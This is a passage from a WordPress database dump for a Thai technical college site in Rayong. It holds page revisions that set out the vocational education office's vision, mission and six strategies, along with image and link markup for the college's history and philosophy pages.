โดยเฉพาะสาขาที่มีศักยภาพและความพร้อม ประกอบไปด้วยกลยุทธ์ ดังนี้</div>\r\n<div>1. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพในเขตชายแดนภาคใต้</div>\r\n<div>2. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพในพื้นที่ชายแดน และเขตพัฒนาพิเศษเฉพาะกิจ</div>\r\n<div>3. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพตามโครงการพระราชดำริ</div>\r\n<div>4. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาร่วมกับประเทศเพื่อนบ้านเพื่อสร้างความเข้าใจอันดี</div>\r\n<div></div>\r\n<div><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ ที่ 6 สนับสนุนการวิจัยและพัฒนาถ่ายทอดองค์ความรู้และเทคโนโลยี </span></strong></div>\r\n<div></div>\r\n<div>เพื่อให้การอาชีวศึกษาเป็นองค์กรแห่งการเรียนรู้ ตั้งแต่การพัฒนาระบบการบริหารจัดการให้เอื้อต่อการเรียนรู้ การสร้างองค์ความรู้ และนวัตกรรมทางวิชาชีพ การเชื่อมโยงการวิจัยกับกระบวนการจัดการเรียนการสอนวิชาชีพ มีกลไกนำผลการวิจัยไปใช้ประโยชน์ได้จริง มีกลยุทธ์ ดังนี้</div>\r\n<div>1. ส่งเสริมพัฒนาการวิจัย สร้างนวัตกรรม สิ่งประดิษฐ์ และการวิจัยเชิงนโยบาย การวิจัยเพื่อตอบสนองความต้องการของสถานประกอบการ</div>\r\n<div>2. ส่งเสริมการนำองค์ความรู้ เทคโนโลยี และนวัตกรรม ไปใช้พัฒนาคุณภาพการบริหารจัดการและการเรียนการสอน</div>\r\n<div>3. ส่งเสริมให้นำความรู้ เทคโนโลยี สิ่งประดิษฐ์ และนวัตกรรม ไปใช้พัฒนาอาชีพ จดสิทธิบัตร และพัฒนาสู่เชิงพาณิชย์</div>\r\n<div>4. พัฒนาระบบบริหารจัดการ เครือข่ายงานวิจัย และการจัดการความรู้อาชีวศึกษา ทั้งในประเทศและระดับนานาชาติ</div>\r\n</div>\r\n</div>\r\n</div>', 'วิสัยทัศน์', '', 'inherit', 'closed', 'closed', '', '1091-revision-v1', '', '', '2018-02-15 16:24:26', '2018-02-15 09:24:26', '', 1091, 'http://www.technicrayong.ac.th/1091-revision-v1/', 0, 'revision', '', 0),
(1096, 3, '2018-02-15 16:25:37', '2018-02-15 09:25:37', '<img class=\"aligncenter wp-image-1092 size-full\" src=\"/wp-content/uploads/2018/02/15-2-2561-16-21-21.jpg\" alt=\"\" width=\"835\" height=\"623\" />\r\n\r\n \r\n<div><strong>สำนักงานคณะกรรมการการอาชีวศึกษา</strong></div>\r\n<div></div>\r\n<div>สำนักงานคณะกรรมการการอาชีวศึกษาได้ดำเนินการในการผลิตและพัฒนากำลังคน เพื่อสนองตอบความต้องการกำลังคนในการพัฒนาประเทศ โดยในปี 2551 ได้สร้างภาพลักษณ์ที่ดีให้กับการอาชีวศึกษา เพื่อสร้างความนิยมในการเรียนวิชาชีพให้กับสังคม มีเป้าหมายเพื่อเพิ่มปริมาณผู้เรียน ในขณะเดียวกันได้ใช้กิจกรรมการบริการสังคมในโครงการและวาระพิเศษต่างๆเพื่อให้สังคมได้รับรู้ถึงศักยภาพของผู้เรียนอาชีวศึกษา และเป็นการสร้างประสบการณ์ให้กับผู้เรียนทั้งในด้านการฝึกงานวิชาชีพและปลูกฝังสำนึกการบริการสังคม นอกจากนี้ได้เน้นเครือข่ายความร่วมมือกับทุกภาคส่วนให้เข้ามาร่วมรับผิดชอบและมีบทบาทในการจัดการอาชีวศึกษาร่วมกันมากขึ้น ผลการดำเนินการดังกล่าวในปี 2551 ช่วยทำให้การอาชีวศึกษาเป็นที่รู้จักกับสังคมมากขึ้น และกลุ่มเป้าหมายต่างต้องการเข้าสู่ระบบอาชีวศึกษา ดังนั้นในปี2552 นี้ สำนักงานคณะกรรมการการอาชีวศึกษา จึงต้องการที่จะพัฒนาด้านคุณภาพให้เพิ่มขึ้นควบคู่ไปกับปริมาณผู้เรียน และขยายบทบาทการจัดการอาชีวศึกษาสำหรับผู้เรียนที่เป็นผู้มีงานทำแล้ว ผู้ที่ต้องการพัฒนาศักยภาพ และผู้ที่กำลังหางานทำให้มากขึ้น และให้ความสำคัญกับการค้นหา พัฒนา เผยแพร่ นวัตกรรม เทคโนโลยีเพื่อสร้าง และพัฒนาอาชีพให้เกิดประโยชน์ในเชิงพาณิชย์ จึงได้กำหนดแผนปฏิบัติราชการในปีงบประมาณ 2552 ไว้ดังนี้</div>\r\n<div></div>\r\n<div></div>\r\n<div><strong>วิสัยทัศน์</strong></div>\r\n<div>สำนักงานคณะกรรมการการอาชีวศึกษา เป็นองค์กรหลักที่มุ่งมั่นผลิตและพัฒนากำลังคนอาชีวศึกษาให้มีคุณภาพและมาตรฐาน สอดคล้องกับการพัฒนาเศรษฐกิจและสังคม ส่งผลต่อการเพิ่มขีดความสามารถในการแข่งขันของประเทศ</div>\r\n<div></div>\r\n<div></div>\r\n<div><strong>พันธกิจ </strong></div>\r\n<div>• จัดการอาชีวศึกษาและฝึกอบรมวิชาชีพให้มีคุณภาพมาตรฐาน</div>\r\n<div>• ขยายโอกาสทางการศึกษาวิชาชีพ อย่างทั่วถึงและเสมอภาค</div>\r\n<div>• วิจัย สร้างนวัตกรรม พัฒนาองค์ความรู้ เพื่อการพัฒนาอาชีพ</div>\r\n<div>ในการผลักดันให้วิสัยทัศน์และพันธกิจบรรลุตามเป้าหมายนั้น สำนักงานคณะกรรมการการอาชีวศึกษาได้กำหนดยุทธศาสตร์ไว้ 6 ยุทธศาสตร์ 35 กลยุทธ์ ดังนี้</div>\r\n<div></div>\r\n<div></div>\r\n<div><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 1 : การพัฒนาการจัดการอาชีวศึกษาและการฝึกอบรมวิชาชีพให้มีคุณภาพมาตรฐาน</span></strong></div>\r\n<div></div>\r\n<div>สำนักงานคณะกรรมการการอาชีวศึกษามีภารกิจเกี่ยวกับการจัดการอาชีวศึกษาและการฝึกอบรมวิชาชีพโดยคำนึงถึงคุณธรรมและความเป็นเลิศทางวิชาชีพ การพัฒนาการจัดการอาชีวศึกษาและฝึกอบรมวิชาชีพ จะเน้นการผลิตกำลังคนให้มีคุณภาพมาตรฐาน มีเส้นทางอาชีพที่ชัดเจน เพื่อสนับสนุนขีดความสามารถในการแข่งขันของประเทศ ตลอดจนให้มีการรับรองสมรรถนะของบุคคลในการประกอบอาชีพ เสริมสร้างทักษะการเป็นผู้ประกอบการ และสร้างค่านิยมที่ดีต่อการอาชีวศึกษา โดยมีเป้าประสงค์ให้ผู้สำเร็จอาชีวศึกษาและการฝึกอบรมวิชาชีพมีคุณภาพ มาตรฐาน มีงานทำและดำรงชีวิตอย่างมีความสุขในสังคม โดยมีกลยุทธ์หลักคือ</div>\r\n<div>1. พัฒนาครูและบุคลากรอาชีวศึกษา</div>\r\n<div>2. เร่งรัดพัฒนาคุณภาพและสมรรถนะผู้เรียน</div>\r\n<div>3. สร้างมาตรฐานและพัฒนาหลักสูตร กระบวนการเรียนการสอน และการวัดและประเมินผล</div>\r\n<div>4. ส่งเสริมการประกันคุณภาพสถานศึกษา</div>\r\n<div>5. ส่งเสริมคุณธรรม จริยธรรม และจรรยาบรรณวิชาชีพ</div>\r\n<div>6. พัฒนาสถานศึกษาและสถาบันการอาชีวศึกษาให้ได้มาตรฐาน มีความเป็นเลิศทางวิชาชีพ</div>\r\n<div>7. สร้างเสริมประสบการณ์วิชาชีพ ปลูกจิตอาสา ด้วยการบริการสังคม</div>\r\n<div>8. ส่งเสริมให้นำเทคโนโลยีสารสนเทศ สื่อ นวัตกรรม มาใช้ในการเรียนการสอน เสริมสร้างทักษะการเป็นผู้ประกอบการ</div>\r\n<div>9. สร้างภาพลักษณ์ที่ดีต่อการอาชีวศึกษา</div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<div><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 2 : สร้างเครือข่ายและส่งเสริมความร่วมมือ</span></strong></div>\r\n<div></div>\r\n<div>การผลิตและพัฒนากำลังคนให้ตรงตามความต้องการของประเทศ ต้องได้รับร่วมมือกับองค์กรที่ต้องการใช้กำลังคน ตั้งแต่ภาคการผลิต เอกชน รัฐวิสาหกิจ และชุมชน เพื่อสร้างเครือข่ายความร่วมมือในการจัดการอาชีวศึกษาทั้งในและต่างประเทศ นำไปสู่การกำหนดหลักสูตร กระบวนการจัดการเรียนการสอนในการผลิตกกำลังคนได้ตรงกับความต้องการภาคการผลิตและความต้องการของผู้ใช้ โดยมีเป้าประสงค์ เพื่อผลิตและพัฒนากำลังคนสอดคล้องกับความต้องการของตลาดแรงงานและท้องถิ่น และมีกลยุทธ์ คือ</div>\r\n<div>1. ส่งเสริมและสนับสนุนความร่วมมือในการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพทั้งในและต่างประเทศ</div>\r\n<div>2. สร้างความเข้มแข็งในการสร้างเครือข่ายและความร่วมมือในการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพ</div>\r\n<div>3. พัฒนาฐานข้อมูลความร่วมมือ</div>\r\n<div>4. พัฒนาศูนย์กำลังคนอาชีวศึกษา</div>\r\n<div>5. ประสาน ส่งเสริมและสนับสนุน การจัดการอาชีวศึกษาและการฝึกอบรมวิชาชีพของสถานศึกษาเอกชน สถานประกอบการและเครือข่าย</div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<div><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 3: พัฒนาระบบบริหารจัดการอาชีวศึกษา</span></strong></div>\r\n<div></div>\r\n<div>คุณภาพของการอาชีวศึกษา มีระบบการบริหารจัดการอาชีวศึกษาองค์ประกอบที่สำคัญที่สุดที่จะส่งผลต่อคุณภาพ การปฏิรูประบบราชการ พระราชกฤษฎีกาว่าด้วยหลักเกณฑ์และวิธีการบริหารกิจการบ้านเมืองที่ดี พ.ศ. 2546 และนำแนวทางการพัฒนาคุณภาพการบริหารจัดการภาครัฐ (Public Sector Management Quality Award : PMQA) ซี่งเป็นเครื่องมือในการพัฒนาองค์กรไปสู่ความเป็นเลิศ ในขณะที่กฎหมายการอาชีวศึกษาได้ระบุถึงการจัดตั้งสถาบันการอาชีวศึกษา ซึ่งต้องมีการพัฒนาระบบการบริหารและจัดการในรูปแบบสถาบันการอาชีวศึกษาควบคู่ไปด้วย อีกทั้งจากการประกาศใช้กฎหมายการอาชีวศึกษาดังกล่าว มีผลให้ต้องสร้างกฎหมาย กฎระเบียบ ต่างๆเพื่อนำไปสู่การปฏิบัติ</div>\r\n<div>ดังนั้นเพื่อให้การพัฒนาระบบบริหารและจัดการอาชีวศึกษาเป็นไปอย่างมีประสิทธิภาพ จึงได้กำหนดกลยุทธ์ไว้ดังนี้</div>\r\n<div>1. จัดและพัฒนาโครงสร้างการบริหารงานให้เป็นไปตาม ก.ม.การอาชีวศึกษาและก.ม.อื่นที่เกี่ยวข้อง</div>\r\n<div>2. พัฒนาระบบบริหารจัดการตามหลักเกณฑ์คุณภาพการบริหารจัดการภาครัฐและธรรมาภิบาล</div>\r\n<div>3. พัฒนากฎหมาย กฎ ระเบียบ ข้อบังคับ</div>\r\n<div>4. กระจายอำนาจการบริหารจัดการสู่สถานศึกษาและสถาบัน</div>\r\n<div>5. ผลักดันการจัดตั้งสถาบันการอาชีวศึกษา</div>\r\n<div>6. พัฒนาระบบติดตามและประเมินผลให้มีประสิทธิภาพ</div>\r\n<div>7. พัฒนาระบบการตรวจสอบภายในให้มีประสิทธิภาพ</div>\r\n<div>8. ส่งเสริมการนำเทคโนโลยีสารสนเทศเพื่อการบริหารจัดการและการให้บริการ</div>\r\n<div>9. เสริมสร้างสวัสดิการและขวัญกำลังใจ</div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<div><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 4 : ขยายโอกาสทางการศึกษาวิชาชีพและส่งเสริมการเรียนรู้ตลอดชีวิต</span></strong></div>\r\n<div></div>\r\n<div>มุ่งเน้นการเพิ่มโอกาสทางการศึกษาวิชาชีพให้ประชาชนทุกคนมีโอกาสเข้าถึงการศึกษาด้านวิชาชีพที่มีคุณภาพมาตรฐานอย่างต่อเนื่องตลอดชีวิต ทั้งการศึกษาในระบบ</div>\r\n<div>การศึกษานอกระบบ และการศึกษาตามอัธยาศัย โดยมีจุดมุ่งหมายให้คลอบคลุมประชาชนทุกเพศทุกวัย และกลุ่มเป้าหมายทั้งเด็ก เยาวชน วัยแรงงาน สตรี ผู้สูงอายุ โดยเฉพาะผู้ยากไร้ ด้อยโอกาสคนพิการ ผู้ห่างไกลทุรกันดารและชนกลุ่มน้อย มีกลยุทธ์ดังนี้</div>\r\n<div></div>\r\n<div>1. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพ ด้วยรูปแบบที่หลากหลายทั้งในระบบ นอกระบบ และทวิภาคี</div>\r\n<div>2. ส่งเสริมและพัฒนาอาชีพให้ประชาชนในการสร้างงานสร้างรายได้</div>\r\n<div>3. จัดการศึกษาวิชาชีพแก่ผู้ด้อยโอกาส คนพิการ ผู้สูงอายุ</div>\r\n<div>4. ส่งเสริมให้มีการสร้างรายได้ระหว่างเรียน</div>\r\n<div></div>\r\n<div></div>\r\n<div><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 5 : จัดอาชีวศึกษาเพื่อสร้างเสริมความมั่นคงของรัฐ</span></strong></div>\r\n<div></div>\r\n<div>ส่งเสริมการจัดการศึกษาในจังหวัดชายแดน ให้เป็นกลไกเสริมสร้างความสมานฉันท์ สันติวิธี วิถีประชาธิปไตย บนพื้นฐานความหลากหลายทางวัฒนธรรม และความเป็นอัตลักษณ์ของแต่ละพื้นที่ มีความร่วมมือระหว่างประเทศด้านการศึกษา แลกเปลี่ยนความรู้ พัฒนาวิชาการ/วิชาชีพ เตรียมความพร้อมรองรับการเปิดเสรีการค้าในอนาคต โดยหวังผลให้ประเทศไทยเป็นศูนย์กลางการศึกษาวิชาชีพในภูมิภาค โดยเฉพาะสาขาที่มีศักยภาพและความพร้อม ประกอบไปด้วยกลยุทธ์ ดังนี้</div>\r\n<div>1. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพในเขตชายแดนภาคใต้</div>\r\n<div>2. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพในพื้นที่ชายแดน และเขตพัฒนาพิเศษเฉพาะกิจ</div>\r\n<div>3. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพตามโครงการพระราชดำริ</div>\r\n<div>4. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาร่วมกับประเทศเพื่อนบ้านเพื่อสร้างความเข้าใจอันดี</div>\r\n<div></div>\r\n<div></div>\r\n<div><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ ที่ 6 สนับสนุนการวิจัยและพัฒนาถ่ายทอดองค์ความรู้และเทคโนโลยี </span></strong></div>\r\n<div></div>\r\n<div>เพื่อให้การอาชีวศึกษาเป็นองค์กรแห่งการเรียนรู้ ตั้งแต่การพัฒนาระบบการบริหารจัดการให้เอื้อต่อการเรียนรู้ การสร้างองค์ความรู้ และนวัตกรรมทางวิชาชีพ การเชื่อมโยงการวิจัยกับกระบวนการจัดการเรียนการสอนวิชาชีพ มีกลไกนำผลการวิจัยไปใช้ประโยชน์ได้จริง มีกลยุทธ์ ดังนี้</div>\r\n<div>1. ส่งเสริมพัฒนาการวิจัย สร้างนวัตกรรม สิ่งประดิษฐ์ และการวิจัยเชิงนโยบาย การวิจัยเพื่อตอบสนองความต้องการของสถานประกอบการ</div>\r\n<div>2. ส่งเสริมการนำองค์ความรู้ เทคโนโลยี และนวัตกรรม ไปใช้พัฒนาคุณภาพการบริหารจัดการและการเรียนการสอน</div>\r\n<div>3. ส่งเสริมให้นำความรู้ เทคโนโลยี สิ่งประดิษฐ์ และนวัตกรรม ไปใช้พัฒนาอาชีพ จดสิทธิบัตร และพัฒนาสู่เชิงพาณิชย์</div>\r\n<div>4. พัฒนาระบบบริหารจัดการ เครือข่ายงานวิจัย และการจัดการความรู้อาชีวศึกษา ทั้งในประเทศและระดับนานาชาติ</div>\r\n</div>\r\n</div>\r\n</div>', 'วิสัยทัศน์', '', 'inherit', 'closed', 'closed', '', '1091-revision-v1', '', '', '2018-02-15 16:25:37', '2018-02-15 09:25:37', '', 1091, 'http://www.technicrayong.ac.th/1091-revision-v1/', 0, 'revision', '', 0),
(1097, 3, '2018-02-15 16:28:26', '2018-02-15 09:28:26', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"wp-image-952 alignnone\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"1500\" height=\"962\" /><img class=\"wp-image-953 alignnone\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26-300x204.jpg\" alt=\"\" width=\"1500\" height=\"1020\" /><img class=\"wp-image-954 alignnone\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46-300x208.jpg\" alt=\"\" width=\"1500\" height=\"1040\" /></h4>\r\n<a href=\"http://www.technicrayong.ac.th/%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%B1%E0%B8%A2%E0%B8%97%E0%B8%B1%E0%B8%A8%E0%B8%99%E0%B9%8C/\"><img class=\"alignleft wp-image-971\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-32-58-1.jpg\" alt=\"\" width=\"204\" height=\"110\" /></a>\r\n\r\n<img class=\" wp-image-972 alignleft\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-34-49-1.jpg\" alt=\"\" width=\"197\" height=\"108\" />\r\n\r\n<img class=\" wp-image-973 alignleft\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-36-58-1.jpg\" alt=\"\" width=\"195\" height=\"105\" />\r\n\r\n<img class=\"wp-image-974 alignleft\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-38-34-1.jpg\" alt=\"\" width=\"192\" height=\"103\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-994 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-13-13-21.jpg\" alt=\"\" width=\"824\" height=\"623\" />\r\n\r\n<img class=\"wp-image-997 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/6-2-2561-13-33-01.jpg\" alt=\"\" width=\"812\" height=\"618\" />\r\n\r\n<img class=\"aligncenter wp-image-998 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-13-41-55.jpg\" alt=\"\" width=\"804\" height=\"616\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-15 16:28:26', '2018-02-15 09:28:26', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1098, 3, '2018-02-16 10:06:54', '2018-02-16 03:06:54', '<img class=\"aligncenter wp-image-1099 size-full\" src=\"/wp-content/uploads/2018/02/16-2-2561-10-06-07.jpg\" alt=\"\" width=\"815\" height=\"607\" />\r\n\r\n<a href=\"http://www.technicrayong.ac.th/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>', 'พันธกิจ', '', 'publish', 'closed', 'closed', '', '%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b8%81%e0%b8%b4%e0%b8%88', '', '', '2018-06-19 13:46:50', '2018-06-19 06:46:50', '', 0, 'http://www.technicrayong.ac.th/?page_id=1098', 0, 'page', '', 0),
(1099, 3, '2018-02-16 10:05:17', '2018-02-16 03:05:17', '', '16-2-2561 10-06-07', '', 'inherit', 'closed', 'closed', '', '16-2-2561-10-06-07', '', '', '2018-02-16 10:05:17', '2018-02-16 03:05:17', '', 1098, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/16-2-2561-10-06-07.jpg', 0, 'attachment', 'image/jpeg', 0),
(1100, 3, '2018-02-16 10:05:47', '2018-02-16 03:05:47', '<img class=\"aligncenter wp-image-1099 size-full\" src=\"/wp-content/uploads/2018/02/16-2-2561-10-06-07.jpg\" alt=\"\" width=\"815\" height=\"607\" />', 'พันธกิจ', '', 'inherit', 'closed', 'closed', '', '1098-revision-v1', '', '', '2018-02-16 10:05:47', '2018-02-16 03:05:47', '', 1098, 'http://www.technicrayong.ac.th/1098-revision-v1/', 0, 'revision', '', 0),
(1102, 3, '2018-02-16 10:08:25', '2018-02-16 03:08:25', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"wp-image-952 alignnone\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"1500\" height=\"962\" /><img class=\"wp-image-953 alignnone\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26-300x204.jpg\" alt=\"\" width=\"1500\" height=\"1020\" /><img class=\"wp-image-954 alignnone\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46-300x208.jpg\" alt=\"\" width=\"1500\" height=\"1040\" /></h4>\r\n<a href=\"/%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%B1%E0%B8%A2%E0%B8%97%E0%B8%B1%E0%B8%A8%E0%B8%99%E0%B9%8C/\"><img class=\"alignleft wp-image-971\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-32-58-1.jpg\" alt=\"\" width=\"204\" height=\"110\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/พันธกิจ\"><img class=\"alignleft wp-image-972\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-34-49-1.jpg\" alt=\"\" width=\"197\" height=\"108\" /></a>\r\n\r\n<img class=\" wp-image-973 alignleft\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-36-58-1.jpg\" alt=\"\" width=\"195\" height=\"105\" />\r\n\r\n<img class=\"wp-image-974 alignleft\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-38-34-1.jpg\" alt=\"\" width=\"192\" height=\"103\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-994 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-13-13-21.jpg\" alt=\"\" width=\"824\" height=\"623\" />\r\n\r\n<img class=\"wp-image-997 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/6-2-2561-13-33-01.jpg\" alt=\"\" width=\"812\" height=\"618\" />\r\n\r\n<img class=\"aligncenter wp-image-998 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-13-41-55.jpg\" alt=\"\" width=\"804\" height=\"616\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-16 10:08:25', '2018-02-16 03:08:25', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1103, 3, '2018-02-16 10:36:32', '2018-02-16 03:36:32', '<img class=\"aligncenter wp-image-1104 size-full\" src=\"/wp-content/uploads/2018/02/16-2-2561-10-33-35.jpg\" alt=\"\" width=\"804\" height=\"600\" />\r\n\r\n<a href=\"http://www.technicrayong.ac.th/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>', 'ปรัชญา', '', 'publish', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b1%e0%b8%8a%e0%b8%8d%e0%b8%b2', '', '', '2018-06-19 13:49:39', '2018-06-19 06:49:39', '', 0, 'http://www.technicrayong.ac.th/?page_id=1103', 0, 'page', '', 0),
(1104, 3, '2018-02-16 10:34:14', '2018-02-16 03:34:14', '', '16-2-2561 10-33-35', '', 'inherit', 'closed', 'closed', '', '16-2-2561-10-33-35', '', '', '2018-02-16 10:34:14', '2018-02-16 03:34:14', '', 1103, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/16-2-2561-10-33-35.jpg', 0, 'attachment', 'image/jpeg', 0),
(1105, 3, '2018-02-16 10:36:32', '2018-02-16 03:36:32', '<img class=\"aligncenter wp-image-1104 size-full\" src=\"/wp-content/uploads/2018/02/16-2-2561-10-33-35.jpg\" alt=\"\" width=\"804\" height=\"600\" />', 'ปรัชญา', '', 'inherit', 'closed', 'closed', '', '1103-revision-v1', '', '', '2018-02-16 10:36:32', '2018-02-16 03:36:32', '', 1103, 'http://www.technicrayong.ac.th/1103-revision-v1/', 0, 'revision', '', 0),
(1107, 3, '2018-02-16 10:38:31', '2018-02-16 03:38:31', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"wp-image-952 alignnone\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"1500\" height=\"962\" /><img class=\"wp-image-953 alignnone\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26-300x204.jpg\" alt=\"\" width=\"1500\" height=\"1020\" /><img class=\"wp-image-954 alignnone\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46-300x208.jpg\" alt=\"\" width=\"1500\" height=\"1040\" /></h4>\r\n<a href=\"/%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%B1%E0%B8%A2%E0%B8%97%E0%B8%B1%E0%B8%A8%E0%B8%99%E0%B9%8C/\"><img class=\"alignleft wp-image-971\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-32-58-1.jpg\" alt=\"\" width=\"204\" height=\"110\" /></a>\r\n\r\n<a href=\"/พันธกิจ\"><img class=\"alignleft wp-image-972\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-34-49-1.jpg\" alt=\"\" width=\"197\" height=\"108\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/ปรัชญา/\"><img class=\"alignleft wp-image-973\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-36-58-1.jpg\" alt=\"\" width=\"195\" height=\"105\" /></a>\r\n\r\n<img class=\"wp-image-974 alignleft\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-38-34-1.jpg\" alt=\"\" width=\"192\" height=\"103\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-994 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-13-13-21.jpg\" alt=\"\" width=\"824\" height=\"623\" />\r\n\r\n<img class=\"wp-image-997 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/6-2-2561-13-33-01.jpg\" alt=\"\" width=\"812\" height=\"618\" />\r\n\r\n<img class=\"aligncenter wp-image-998 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-13-41-55.jpg\" alt=\"\" width=\"804\" height=\"616\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-16 10:38:31', '2018-02-16 03:38:31', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0);
